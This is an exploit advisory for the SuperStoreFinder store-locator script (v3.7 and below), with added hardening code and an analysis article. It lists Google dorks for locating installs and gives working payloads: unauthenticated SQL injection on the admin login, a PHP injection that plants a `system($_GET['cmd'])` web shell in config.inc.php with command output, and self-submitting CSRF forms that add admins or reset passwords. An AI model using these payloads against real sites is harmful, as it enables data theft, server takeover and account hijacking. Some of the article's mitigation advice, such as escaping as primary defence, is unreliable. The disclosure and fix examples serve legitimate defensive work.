SuperStoreFinder - Multiple Vulnerabilities
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities
.:. Google Dorks .:.
"designed and built by Joe Iz."
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
inurl:/superstorefinder/index.php
.:. Date: October 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind, error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
===========================================================================================
Test #1
http://localhost:9000/adminstorefinder/admin/index.php
username=a'&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
)
SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/adminstorefinder/admin/index.php
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
)
===========================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Execution
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]
Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1
config.inc.php is included by index.php, so the injected code is reachable
through the GET parameter ?cmd=
http://localhost:9000/?cmd=uname -a
Response:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
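The payload shape `en_US');<code>//` indicates that settings.php writes language_set into config.inc.php by string concatenation, so the submitted value becomes PHP source. The following is an added example, not SuperStoreFinder's own code, contrasting that assumed writer with one that allow-lists the value and serialises it as data; the function names, allow-list and paths are constructed.

```php
<?php
// Added example (not the vendor's code). The vulnerable shape is inferred from
// the payload on this page; the real settings.php is not reproduced here.

// VULNERABLE (assumed shape): the submitted value is spliced into PHP source.
function write_config_vulnerable(string $path, string $languageSet): void
{
    $php = "<?php\ndefine('LANGUAGE_SET', '" . $languageSet . "');\n";
    file_put_contents($path, $php);   // a closing quote in the input ends the literal
}

// HARDENED: accept only known values, then emit the config with var_export(),
// which escapes quotes and backslashes so the result is always a string literal.
const ALLOWED_LANGUAGES = ['en_US', 'de_DE', 'fr_FR', 'es_ES']; // constructed list

function write_config_hardened(string $path, string $languageSet): void
{
    if (!in_array($languageSet, ALLOWED_LANGUAGES, true)) {
        throw new InvalidArgumentException('unsupported language_set');
    }
    $php = "<?php\nreturn " . var_export(['language_set' => $languageSet], true) . ";\n";
    // Write to a temp file and rename so index.php never includes a half-written config.
    $tmp = $path . '.tmp';
    file_put_contents($tmp, $php, LOCK_EX);
    rename($tmp, $path);
}

// Better still: keep settings out of PHP altogether (JSON or a database row),
// read back with a parser that cannot execute anything.
function write_config_json(string $path, array $settings): void
{
    file_put_contents($path, json_encode($settings, JSON_THROW_ON_ERROR), LOCK_EX);
}

// Demonstration with a constructed injection attempt of the same shape.
$attempt = "en_US');evil();//";
try {
    write_config_hardened('/tmp/config.inc.php', $attempt);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";   // nothing reaches disk
}
write_config_hardened('/tmp/config.inc.php', 'en_US');
$cfg = require '/tmp/config.inc.php';
echo $cfg['language_set'], "\n";                    // en_US, stored as data only
```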
===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing the admin password.
Affected File (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input name="submit_hidden" value="submit_hidden" type="hidden" />
<input type='hidden' name='username' value='X'>
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
Affected File (2): localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/change_password.php' target="CSRF" id="CSRF">
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' name='save' value='save'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
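Both forms above succeed because users_add.php and change_password.php accept any POST that carries the admin's session cookie. An added example (not SuperStoreFinder's code) of the usual fix: a per-session synchronizer token checked with hash_equals(), plus a SameSite session cookie; the handler and function names are hypothetical.

```php
<?php
// Added example (not the vendor's code): CSRF protection for state-changing
// admin forms such as users_add.php and change_password.php.

// SameSite=Strict means a form or iframe on another site submits without the
// session cookie, which also neutralises the logout iframe in the PoC above.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true, 'secure' => true]);
session_start();

// One random token per session, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; any missing or mismatched token is rejected.
function csrf_verify(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Handler sketch for admin/users_add.php.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');   // the hidden-iframe form from another origin lands here
    }
    // ... existing add-user logic: validate username, store password_hash() ...
}

// The legitimate form carries the token; a third-party page cannot read it.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="POST" action="users_add.php">
  <input type="hidden" name="csrf_token" value="$token">
  <input name="username">
  <input type="password" name="password">
  <input type="password" name="cpassword">
  <button name="submit_hidden" value="submit_hidden">Add user</button>
</form>
HTML;
```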
===========================================================================================
SuperStoreFinder: A Critical Analysis of Multiple Security Vulnerabilities in a Popular Store Locator Script
SuperStoreFinder, a widely used PHP-based store locator application available on CodeCanyon, has been identified as a prime example of how poor security practices can lead to critical vulnerabilities in seemingly innocuous web tools. Despite its intended purpose—facilitating customer access to nearby retail locations through Google Maps integration—the software harbors multiple exploitable flaws, particularly in its authentication mechanism and database interaction logic. This article explores the real-world implications of these vulnerabilities, providing a detailed technical breakdown and actionable mitigation strategies.
Overview of the SuperStoreFinder Application
SuperStoreFinder is marketed as a customizable, multi-language store locator script that integrates with Google Maps API, offering features such as geolocation, drag-and-drop markers, bulk import, Google Street View, and route directions. The product is designed for businesses aiming to improve customer navigation to physical locations. However, its popularity on platforms like CodeCanyon has made it a target for attackers due to its widespread deployment across small and medium-sized enterprises.
According to the vendor’s documentation, the application is built using PHP, JavaScript, and MySQL, with a modular architecture that supports extensible themes and custom map styling via Snazzymaps.com. While these features enhance usability, they also introduce surface areas for exploitation if not properly secured.
Key Vulnerability: Unauthenticated SQL Injection in the Admin Login Interface
One of the most critical flaws discovered in SuperStoreFinder versions 3.7 and below lies within the admin/index.php login endpoint. This vulnerability allows attackers to perform SQL injection without requiring authentication, making it a high-risk issue for any deployed instance.
Exploitation Path: Targeting the USERNAME Parameter
The login form accepts user input via POST method, with the USERNAME field being the primary target. The application fails to sanitize input before constructing SQL queries, resulting in direct injection of malicious payloads.
POST /adminstorefinder/admin/index.php HTTP/1.1
Host: localhost:9000
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
username=a'&password=1&btn_login=Login
Explanation: This test payload attempts to inject a single quote into the username field, which disrupts the SQL query structure. The resulting error message reveals the flawed query construction:
SELECT users.* FROM users WHERE users.username='admin''
Notice the dangling single quote after admin—this is a direct consequence of improper input sanitization. The absence of escaping or prepared statements allows attackers to manipulate the SQL syntax.
Proof of Concept: Blind SQL Injection Using Time-Based Techniques
Attackers can exploit this vulnerability using time-based blind SQL injection to extract data without direct output. The following payload leverages MySQL’s SLEEP() function to induce delays based on conditional logic.
username=a' AND (SELECT SLEEP(5) FROM (SELECT 1) AS a WHERE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))=1)-- Seaj
&password=1&btn_login=Login
Explanation: The payload injects a conditional statement that evaluates to true, triggering the SLEEP(5) function. If the server responds with a 5-second delay, it confirms that the SQL query is being executed and that the injection is successful. This technique is particularly effective when no error messages are returned—making it a reliable method for blind exploitation.
Advanced Payload: Error-Based Injection via Function Call
Another variant calls a function that the server's MySQL build does not provide in order to trigger an error-based response. The resulting error message discloses the schema name, revealing part of the underlying database structure.
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login
Explanation: This payload attempts to call JSON_STORAGE_FREE(NULL), a function that this MySQL server does not provide. The resulting error:
FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
confirms that the SQL query is being processed and that the database is vulnerable. This error-based technique is especially useful for identifying database versions and functions, aiding in further exploitation.
Impact and Risk Assessment
The unauthenticated SQL injection vulnerability presents severe risks:
- Database Compromise: Attackers can extract sensitive data such as user credentials, customer records, and store locations.
- Remote Code Execution (RCE): In some cases, SQL injection can be chained with other techniques (e.g., LOAD_FILE() to read server files or SELECT ... INTO OUTFILE to write them) to place malicious files on the server.
- Privilege Escalation: If the database user has elevated privileges, attackers may gain administrative access to the entire system.
- Reputation Damage: Breaches involving customer data can lead to legal liabilities and loss of trust.
Recommendations for Mitigation
To secure SuperStoreFinder installations, developers and administrators must implement the following measures:
| Security Measure | Description |
|---|---|
| Input Sanitization | Use mysqli_real_escape_string() or PDO::quote() to escape user input before SQL execution. |
| Prepared Statements | Replace direct SQL construction with parameterized queries to prevent injection. |
| Authentication Restrictions | Restrict who can reach the admin login endpoint, rather than exposing it to arbitrary unauthenticated users. |
| Database User Privileges | Limit database user permissions to SELECT only, avoiding INSERT, UPDATE, or FILE access. |
| Regular Patching | Upgrade to versions beyond 3.7, or apply vendor patches if available. |
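The query echoed in the error above (`SELECT users.* FROM users WHERE users.username='admin''`) shows the username being concatenated into the SQL text. As an added example (not the vendor's code) of the first two table rows applied to that login, here is the vulnerable shape beside a mysqli prepared statement; the connection details and a password_hash()-based `password` column are assumptions.

```php
<?php
// Added example (not SuperStoreFinder's code). Assumes a mysqli connection and
// a `users` table whose `password` column holds password_hash() output.

// VULNERABLE: input is concatenated into the query string. username=a' becomes
// ... WHERE users.username='a'' and MySQL reports a syntax error, which this
// page shows being echoed straight back to the client.
function login_vulnerable(mysqli $db, string $username): ?array
{
    $sql = "SELECT users.* FROM users WHERE users.username='" . $username . "'";
    $res = $db->query($sql);              // the attacker controls the query text
    return $res ? $res->fetch_assoc() : null;
}

// HARDENED: the query text is fixed at prepare time and the username is bound
// as data, so quotes in the input can never alter the SQL syntax.
function login_hardened(mysqli $db, string $username, string $password): ?array
{
    $stmt = $db->prepare('SELECT users.* FROM users WHERE users.username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $user = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify against a password_hash() digest; the password never enters the query.
    if ($user === null || !password_verify($password, $user['password'])) {
        return null;
    }
    unset($user['password']);
    return $user;
}

// Usage sketch for admin/index.php. Driver exceptions should be logged, not
// echoed: the "Invalid query: ..." array on this page is what made the
// error-based technique possible.
$db = new mysqli('localhost', 'ssf_user', 'secret', 'adminstorefinder'); // constructed
$db->set_charset('utf8mb4');
try {
    $user = login_hardened($db, $_POST['username'] ?? '', $_POST['password'] ?? '');
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage());
    $user = null;
}
if ($user === null) {
    http_response_code(401);
    exit('Invalid username or password'); // one generic message for every failure
}
```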
Conclusion: The Importance of Secure Development Practices
SuperStoreFinder exemplifies how even well-intentioned tools can become security liabilities when built without proper safeguards. The combination of unauthenticated access, poor input handling, and direct SQL query construction creates a perfect storm for exploitation. This case underscores the necessity of rigorous security testing, adherence to OWASP guidelines, and continuous monitoring of third-party software.
For organizations using such scripts, it is imperative to conduct vulnerability assessments, apply patches promptly, and consider replacing outdated components with secure, audited alternatives. Cybersecurity is not a one-time effort—it demands ongoing vigilance, especially in the face of widely distributed applications that may be overlooked in routine audits.